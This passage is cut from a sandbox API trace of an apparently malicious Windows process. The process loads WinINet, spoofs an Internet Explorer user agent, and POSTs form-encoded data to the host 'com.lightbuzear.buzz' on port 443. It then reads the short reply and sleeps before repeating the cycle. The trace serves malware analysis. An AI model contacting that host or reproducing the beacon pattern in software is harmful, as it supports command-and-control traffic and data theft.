lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0230.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0230.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815620 [0230.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0230.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0230.014] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0230.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0230.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0230.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0230.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0230.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0230.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0230.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156e0 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815650 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815650 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830318 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0230.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300c0 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0230.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0230.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0230.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0230.016] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0230.017] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0230.017] FreeLibrary (hLibModule=0x71780000) returned 1 [0230.017] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0230.017] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0230.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0230.017] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0230.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0230.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0230.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48156e0 [0230.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0230.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0230.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0230.019] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0230.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0230.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0230.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0230.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0230.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0230.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0230.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0230.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815728 [0230.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0230.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0230.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0230.021] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0230.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0230.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0230.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0230.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155d8 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815740 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815740 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830480 [0230.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0230.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0230.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0230.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830200 [0230.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0230.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0230.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0230.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0230.024] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0230.024] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0230.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0230.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815740 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815758 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815740 | out: hHeap=0x4780000) returned 1 [0230.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0230.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815758 | out: hHeap=0x4780000) returned 1 [0230.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830138 [0230.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0230.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0230.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830138 | out: hHeap=0x4780000) returned 1 [0230.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830250 [0230.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0230.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0230.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0230.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0230.043] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0230.043] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0232.265] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0232.265] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0232.265] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0232.266] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157d0 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155f0 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830048 [0232.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0232.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0232.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0232.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830368 [0232.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0232.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0232.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0232.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0232.267] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0232.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0232.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0232.268] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0232.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0232.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0232.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0232.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0232.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0232.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0232.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0232.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0232.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155f0 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830480 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0232.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482ffa8 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0232.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0232.270] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0232.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0232.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ffa8 | out: hHeap=0x4780000) returned 1 [0232.270] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0232.270] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0232.270] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0232.270] FreeLibrary (hLibModule=0x71570000) returned 1 [0232.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0232.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0232.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0232.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0232.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0232.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0232.272] Sleep (dwMilliseconds=0x2710) [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0232.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0232.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0232.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0232.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0232.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155c0 [0232.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0232.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815770 [0232.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155c0 | out: hHeap=0x4780000) returned 1 [0232.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0232.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815770 | out: hHeap=0x4780000) returned 1 [0232.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815758 [0232.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0232.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0232.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0232.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0232.285] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830318 [0232.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0232.286] HeapFree (in: 